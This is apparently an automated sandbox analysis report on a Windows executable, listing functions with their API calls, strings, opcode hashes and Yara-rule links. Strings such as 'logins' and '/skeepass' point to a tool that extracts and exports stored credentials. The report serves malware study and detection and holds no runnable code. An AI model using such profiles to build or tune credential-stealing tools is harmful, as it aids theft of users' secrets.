                                                                                                                                                                                    • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                    Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                                    • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                    • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                                                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                    • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                                                                                                    • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
